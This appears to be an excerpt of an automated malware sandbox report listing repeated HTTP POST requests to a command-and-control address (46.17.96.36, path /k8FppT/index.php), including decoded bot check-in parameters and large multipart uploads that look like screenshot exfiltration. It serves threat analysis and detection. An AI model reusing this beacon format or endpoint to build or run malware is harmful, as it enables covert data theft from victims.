              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3cHost: 46.17.96.36Content-Length: 107128Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3cHost: 46.17.96.36Content-Length: 107128Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3cHost: 46.17.96.36Content-Length: 107128Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3cHost: 46.17.96.36Content-Length: 107128Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3cHost: 46.17.96.36Content-Length: 107128Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3cHost: 46.17.96.36Content-Length: 107128Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3cHost: 46.17.96.36Content-Length: 107128Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3cHost: 46.17.96.36Content-Length: 107128Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3cHost: 46.17.96.36Content-Length: 107128Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3cHost: 46.17.96.36Content-Length: 107128Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3cHost: 46.17.96.36Content-Length: 107128Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3cHost: 46.17.96.36Content-Length: 107128Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3cHost: 46.17.96.36Content-Length: 107128Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3cHost: 46.17.96.36Content-Length: 107128Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3cHost: 46.17.96.36Content-Length: 107128Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3cHost: 46.17.96.36Content-Length: 107128Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3cHost: 46.17.96.36Content-Length: 107128Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3cHost: 46.17.96.36Content-Length: 107128Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3cHost: 46.17.96.36Content-Length: 107128Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3cHost: 46.17.96.36Content-Length: 107128Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3cHost: 46.17.96.36Content-Length: 107128Cache-Control: no-cache
